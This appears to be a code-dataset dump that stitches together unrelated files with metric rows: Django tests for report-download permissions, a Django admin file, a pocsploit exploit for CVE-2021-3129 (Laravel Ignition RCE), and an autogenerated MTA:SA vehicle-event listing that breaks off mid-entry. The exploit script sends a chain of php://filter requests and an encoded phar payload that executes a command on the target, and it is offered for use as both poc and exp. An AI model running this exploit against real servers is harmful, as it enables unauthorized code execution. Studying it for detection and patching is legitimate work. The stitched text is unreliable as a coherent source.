        may_figure.save()
financial_code_obj1 = FinancialCode.objects.create(
programme=self.programme_obj,
cost_centre=cost_centre,
natural_account_code=nac_obj,
)
may_figure1 = BudgetMonthlyFigure.objects.create(
financial_period=FinancialPeriod.objects.get(financial_period_code=2,),
amount=self.amount_may,
financial_code=financial_code_obj1,
financial_year=year_obj,
)
        may_figure1.save()
self.year_total = self.amount_apr + self.amount_may
def test_download_mi_budget(self):
assert not self.test_user.has_perm("forecast.can_download_mi_reports")
downloaded_files_url = reverse(
"download_mi_budget",
kwargs={"financial_year": get_current_financial_year()}
)
response = self.client.get(downloaded_files_url)
self.assertEqual(response.status_code, 302)
can_download_files = Permission.objects.get(codename="can_download_mi_reports",)
self.test_user.user_permissions.add(can_download_files)
self.test_user.save()
response = self.client.get(downloaded_files_url)
self.assertEqual(response.status_code, 200)
file = io.BytesIO(response.content)
wb = load_workbook(filename=file, read_only=True,)
ws = wb.active
self.assertEqual(ws["A1"].value, "Entity")
self.assertEqual(ws["A2"].value, "3000")
self.assertEqual(ws["I1"].value, "MAY")
self.assertEqual(ws["H2"].value, self.amount_apr / 100)
self.assertEqual(ws["I2"].value, self.amount_may / 100)
self.assertEqual(ws["W2"].value, self.year_total / 100)
wb.close()
class DownloadOscarPermissionTests(BaseTestCase):
def setUp(self):
self.client.force_login(self.test_user)
def test_download_oscar_view(self):
assert not self.test_user.has_perm("forecast.can_download_oscar")
downloaded_files_url = reverse("download_oscar_report", )
# Should have been redirected (no permission)
resp = self.client.get(
downloaded_files_url
)
assert resp.status_code == 403
can_download_files = Permission.objects.get(codename="can_download_oscar", )
self.test_user.user_permissions.add(can_download_files)
self.test_user.save()
resp = self.client.get(downloaded_files_url)
# Should have been permission now
self.assertEqual(resp.status_code, 200)
class DownloadMIViewLabelTests(BaseTestCase):
def setUp(self):
self.client.force_login(self.test_user)
can_download_files = Permission.objects.get(codename="can_download_mi_reports",)
self.test_user.user_permissions.add(can_download_files)
self.test_user.save()
def test_previous_year_label(self):
previous_year_obj = get_financial_year_obj(get_current_financial_year() - 1)
previous_year_display = previous_year_obj.financial_year_display
downloaded_files_url = reverse("download_mi_report",)
response = self.client.get(downloaded_files_url, follow=False)
soup = BeautifulSoup(response.content, features="html.parser")
# Check that the text of the button shows the previous year
previous_year_button = soup.find(id="id_previous_year_button")
self.assertIn(previous_year_display, str(previous_year_button))
class DownloadMICurrentYearDropdownTests(BaseTestCase):
def setUp(self):
self.client.force_login(self.test_user)
can_download_files = Permission.objects.get(codename="can_download_mi_reports",)
self.test_user.user_permissions.add(can_download_files)
self.test_user.save()
self.current_year = get_current_financial_year()
# Create future years
get_financial_year_obj(self.current_year + 1)
get_financial_year_obj(self.current_year + 2)
get_financial_year_obj(self.current_year + 3)
def test_selectedyear(self):
downloaded_files_url = reverse("download_mi_report",)
response = self.client.get(downloaded_files_url, follow=False)
soup = BeautifulSoup(response.content, features="html.parser")
download_year_option = soup.find_all('option', selected=True)
selected_year = download_year_option[0]['value']
assert (int(selected_year) == self.current_year)
| 38.848485 | 88 | 0.691888 | 1,217 | 10,256 | 5.528348 | 0.14544 | 0.042509 | 0.037455 | 0.034185 | 0.81629 | 0.807967 | 0.802913 | 0.787753 | 0.786118 | 0.786118 | 0 | 0.014382 | 0.220359 | 10,256 | 263 | 89 | 38.996198 | 0.827039 | 0.044949 | 0 | 0.641148 | 0 | 0 | 0.052944 | 0.031378 | 0 | 0 | 0 | 0 | 0.133971 | 1 | 0.052632 | false | 0 | 0.052632 | 0 | 0.129187 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5a241302b5c32f6194d0ed7843e39f6dbf0330fb | 201 | py | Python | filechecker/admin.py | acdh-oeaw/acdh-django-filechecker | c4cee7dcf823efacc85676c81d97df9cb3e0aa26 | [
"MIT"
] | null | null | null | filechecker/admin.py | acdh-oeaw/acdh-django-filechecker | c4cee7dcf823efacc85676c81d97df9cb3e0aa26 | [
"MIT"
] | 6 | 2020-06-05T18:32:02.000Z | 2022-02-10T07:22:24.000Z | filechecker/admin.py | acdh-oeaw/acdh-django-filechecker | c4cee7dcf823efacc85676c81d97df9cb3e0aa26 | [
"MIT"
] | 1 | 2020-06-30T13:52:41.000Z | 2020-06-30T13:52:41.000Z | from django.contrib import admin
from mptt.admin import MPTTModelAdmin
from . models import FcCollection, FcResource
admin.site.register(FcCollection, MPTTModelAdmin)
admin.site.register(FcResource)
| 25.125 | 49 | 0.840796 | 24 | 201 | 7.041667 | 0.5 | 0.106509 | 0.201183 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094527 | 201 | 7 | 50 | 28.714286 | 0.928571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ce479b287ee016901d26d23680bed130edafbc5f | 7,691 | py | Python | 2021/CVE-2021-3129/poc/pocsploit/CVE-2021-3129.py | hjyuan/reapoc | ef515e56c44c2590ff8601582bf6c08e076e7083 | ["Apache-2.0"]
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Laravel <= v8.4.2 Debug Mode - Remote Code Execution''',
"description": '''Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.''',
"severity": "critical",
"references": [
"https://www.ambionics.io/blog/laravel-debug-rce",
"https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "",
"cve-id": "CVE-2021-3129",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2021", "laravel", "rce"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/_ignition/execute-solution"""
method = "POST"
data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/_ignition/execute-solution"""
method = "POST"
data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
resp1 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/_ignition/execute-solution"""
method = "POST"
data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "AA"}}
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
resp2 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/_ignition/execute-solution"""
method = "POST"
        data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=4"
                "1=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"}}
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
resp3 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/_ignition/execute-solution"""
method = "POST"
data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
resp4 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/_ignition/execute-solution"""
method = "POST"
data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}}
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
resp5 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp5.status_code == 500) and ("""uid=""" in resp5.text and """gid=""" in resp5.text and """groups=""" in resp5.text and """Illuminate""" in resp5.text):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
    except Exception:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
    return url
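
As a standalone check, the normalization logic of `format_url` can be exercised on its own (the function is reproduced here so the snippet runs without the rest of the poc):

```python
def format_url(url):
    # Same normalization as the helper above: trim whitespace, default to
    # an http:// scheme, and drop a trailing slash so paths append cleanly.
    url = url.strip()
    if not (url.startswith('http://') or url.startswith('https://')):
        url = 'http://' + url
    return url.rstrip('/')

print(format_url(' example.com/ '))  # http://example.com
```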
ce519d7c9cfbbb1ae8ab6b8592048552398639bb | 42,296 | py | Python | events/vehicle_events.py | mtasa-typescript/mtasa-wiki-dump | edea1746850fb6c99d6155d1d7891e2cceb33a5c | ["MIT"]
# Autogenerated file. ANY CHANGES WILL BE OVERWRITTEN
from to_python.core.types import FunctionType, \
FunctionArgument, \
FunctionArgumentValues, \
FunctionReturnTypes, \
FunctionSignature, \
FunctionDoc, \
EventData, \
CompoundEventData
DUMP_PARTIAL = [
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientTrailerAttach',
docs=FunctionDoc(
description='This event is triggered by a trailer when it gets attached to a towing vehicle.' ,
arguments={
"towedBy": """the vehicle that is now towing the trailer. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='towedBy',
argument_type=FunctionType(
names=['vehicle'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientTrailerDetach',
docs=FunctionDoc(
description='This event is triggered when a trailer gets detached from its towing vehicle.' ,
arguments={
"towedBy": """the vehicle that was towing the trailer. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='towedBy',
argument_type=FunctionType(
names=['vehicle'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientVehicleCollision',
docs=FunctionDoc(
description='This event is triggered when a vehicle collides with an element or a world object.\nNote that the collision reported by this event doesnt always damage the vehicle by default (this event triggers when hitting lamp posts, but the vehicle isnt damaged by them automatically, for example). If you want to deal with real damage, please refer to onClientVehicleDamage.' ,
arguments={
"theHitElement": """the other entity, or nil if the vehicle collided with the world """,
"damageImpulseMag": """the impact magnitude (Note: this is NOT the damage it is a force value which is then multiplied by the vehicles collision damage multiplier. for an example of this see below) """,
"bodyPart": """the bodypart that hit the other element """,
"collisionX/Y/Z": """the position the collision took place """,
"normalX/Y/Z": """the surface normal of the hit object """,
"hitElementforce": """0 for non vehicles or the force of the other vehicle """,
"model": """model of the hit element (useful to detect building collisions as hitElement will be nil) """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theHitElement',
argument_type=FunctionType(
names=['element'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='damageImpulseMag',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='bodypart',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='collisionX',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='collisionY',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='collisionZ',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='normalX',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='normalY',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='normalZ',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='hitElementForce',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='model',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientVehicleDamage',
docs=FunctionDoc(
description='This event is triggered when a vehicle is damaged.' ,
arguments={
"theAttacker": """: An element if there was an attacker. """,
"theWeapon": """: An integer specifying the Weapons|weapon ID if a weapon was used. Otherwise Damage Types|Damage Type ID is used. """,
"loss": """: A float representing the amount of damage taken. """,
"damagePosX": """: A float representing the X co-ordinate of where the damage took place. """,
"damagePosY": """: A float representing the Y co-ordinate of where the damage took place. """,
"damagePosZ": """: A float representing the Z co-ordinate of where the damage took place. """,
"tireID": """: A number representing the tire which took damage, if there is one. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theAttacker',
argument_type=FunctionType(
names=['element'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='theWeapon',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='loss',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='damagePosX',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='damagePosY',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='damagePosZ',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='tireID',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientVehicleEnter',
docs=FunctionDoc(
description='This event gets fired when a player or ped enters a vehicle.' ,
arguments={
"thePed": """the player or ped that entered the vehicle """,
"seat": """the number of the seat that the ped is now sitting on. 0 = driver, higher numbers are passenger seats. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='thePed',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='seat',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientVehicleExit',
docs=FunctionDoc(
description='This event gets fired when a ped or player gets out of a vehicle.' ,
arguments={
"thePed": """the player or ped element that exited the vehicle """,
"seat": """the number of the seat that the player was sitting on. 0 = driver, higher numbers are passenger seats. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='thePed',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='seat',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientVehicleExplode',
docs=FunctionDoc(
description='This event is triggered when a vehicle explodes.' ,
arguments={
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientVehicleNitroStateChange',
docs=FunctionDoc(
description='This event gets triggered when nitro state is changing.' ,
arguments={
"state": """current state of nitro """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='state',
argument_type=FunctionType(
names=['bool'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientVehicleRespawn',
docs=FunctionDoc(
description='This event is triggered when a vehicle respawns.' ,
arguments={
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientVehicleStartEnter',
docs=FunctionDoc(
description='This event is triggered when a ped or player starts entering a vehicle. Once the entering animation completes, onClientVehicleEnter is triggered.' ,
arguments={
"thePed": """the ped that just started entering a vehicle. """,
"seat": """the number of the seat he is going to sit on. """,
"door": """An integer of which door the ped used (0-3). 0 is driver side door, 1 is front passenger, 2 is back left, 3 is back right. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='thePed',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='seat',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='door',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientVehicleStartExit',
docs=FunctionDoc(
description='This event is triggered when a ped or player starts exiting a vehicle. Once the exiting animation completes, onClientVehicleExit is triggered.' ,
arguments={
"thePed": """the ped who started exiting the vehicle. """,
"seat": """the number of the seat that the ped was sitting on. """,
"door": """the number of the door that the ped is using to leave. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='thePed',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='seat',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='door',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientVehicleWeaponHit',
docs=FunctionDoc(
description='This event is called when a vehicle weapon hits an element or the world.' ,
arguments={
"weaponType": """: The type of vehicle weapon. (See the list below) """,
"hitElement": """: The vehicle, ped or player that was hit by the weapon sometimes false. """,
                        "hitX": """: The X world co-ordinate of where the hit occurred. """,
                        "hitY": """: The Y world co-ordinate of where the hit occurred. """,
                        "hitZ": """: The Z world co-ordinate of where the hit occurred. """,
"model": """: The model ID of the element that was hit. """,
"materialID": """: The material ID of the element that was hit. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='weaponType',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='hitElement',
argument_type=FunctionType(
names=['element'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='hitX',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='hitY',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='hitZ',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='model',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='materialID',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
EventData(
name='onTrailerAttach',
docs=FunctionDoc(
description='This event is triggered when a trailer is attached to a truck or when a tow truck hooks on to a vehicle.' ,
arguments={
"theTruck": """: the truck vehicle that got attached to this trailer. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theTruck',
argument_type=FunctionType(
names=['vehicle'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
client=[
],
),
CompoundEventData(
server=[
EventData(
name='onTrailerDetach',
docs=FunctionDoc(
description='This event is triggered when a trailer is detached from a truck.' ,
arguments={
"theTruck": """: the truck vehicle that this trailer got detached from. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theTruck',
argument_type=FunctionType(
names=['vehicle'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
client=[
],
),
CompoundEventData(
server=[
EventData(
name='onVehicleDamage',
docs=FunctionDoc(
description='This event is triggered when a vehicle is damaged. If you want to get the attacker you can use onClientVehicleDamage.' ,
arguments={
"loss": """: a float representing the amount of health the vehicle lost. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='loss',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
client=[
],
),
CompoundEventData(
server=[
EventData(
name='onVehicleEnter',
docs=FunctionDoc(
description='This event is triggered when a player or ped enters a vehicle.' ,
arguments={
"thePed": """: a player or ped element who is entering the vehicle. """,
"seat": """: an int representing the seat in which the ped is entering. Seat 0 is the drivers seat. """,
"jacked": """: a player or ped element representing who has been jacked. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='thePed',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='seat',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='jacked',
argument_type=FunctionType(
names=['player'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
client=[
],
),
CompoundEventData(
server=[
EventData(
name='onVehicleExit',
docs=FunctionDoc(
description='This event is triggered when a player or ped leaves a vehicle.' ,
arguments={
"thePed": """: a player or ped element who exited the vehicle. """,
"seat": """: an int representing the seat in which the ped exited from. """,
"jacker": """: a player or ped element who jacked the driver. """,
"forcedByScript": """a boolean representing whether the exit was forced using removePedFromVehicle or by the ped/player. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='thePed',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='seat',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='jacker',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='forcedByScript',
argument_type=FunctionType(
names=['bool'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
client=[
],
),
CompoundEventData(
server=[
EventData(
name='onVehicleExplode',
docs=FunctionDoc(
description='This event is triggered when a vehicle explodes.' ,
arguments={
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
],
variable_length=False,
),
)
],
client=[
],
),
CompoundEventData(
server=[
EventData(
name='onVehicleRespawn',
docs=FunctionDoc(
                description='This event is triggered when a vehicle is respawned. See toggleVehicleRespawn.' ,
arguments={
"exploded": """: true if this vehicle respawned because it exploded, false if it respawned due to being deserted. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='exploded',
argument_type=FunctionType(
names=['bool'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
client=[
],
),
CompoundEventData(
server=[
EventData(
name='onVehicleStartEnter',
docs=FunctionDoc(
description='This event is triggered when a player or ped starts to enter a vehicle. This event can be used to cancel entry, if necessary.' ,
arguments={
"enteringPed": """: a player or ped element who is starting to enter a vehicle. """,
"seat": """: an int representing the seat in which the ped is entering. """,
"jacked": """: a player or ped element representing who is going to be jacked. """,
"door": """: an int of which door is being used (0-3). 0 is driver side door, 1 is front passenger, 2 is back left, 3 is back right. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='enteringPed',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='seat',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='jacked',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
                    ],
                    [
                        FunctionArgument(
                            name='door',
                            argument_type=FunctionType(
                                names=['int'],
                                is_optional=False,
                            ),
                            default_value=None,
                        )
                    ]
],
variable_length=False,
),
)
],
client=[
],
),
CompoundEventData(
server=[
EventData(
name='onVehicleStartExit',
docs=FunctionDoc(
description='This event is triggered when a player or ped starts to exit a vehicle. This event can be used to cancel exit, if necessary.' ,
arguments={
"exitingPed": """: a player or ped element who is starting to exit a vehicle. """,
"seat": """: an int representing the seat in which the ped is exiting from. """,
"jacked": """: a player or ped element representing who is jacking. """,
"door": """: an int representing the door that the ped is using to leave. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='exitingPed',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='seat',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='jacked',
argument_type=FunctionType(
names=['ped'],
